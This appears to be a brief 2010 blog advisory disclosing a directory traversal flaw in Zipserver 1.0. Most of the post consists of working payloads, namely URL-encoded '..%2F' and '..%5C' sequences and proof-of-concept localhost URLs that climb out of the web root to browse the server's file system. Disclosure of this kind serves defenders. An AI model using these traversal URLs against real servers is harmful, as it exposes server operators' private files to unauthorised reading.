It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially crafted URL.
Exploit:
..%2F/
..%5C/
PoC:
http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/
http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/
Saturday, May 15, 2010
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment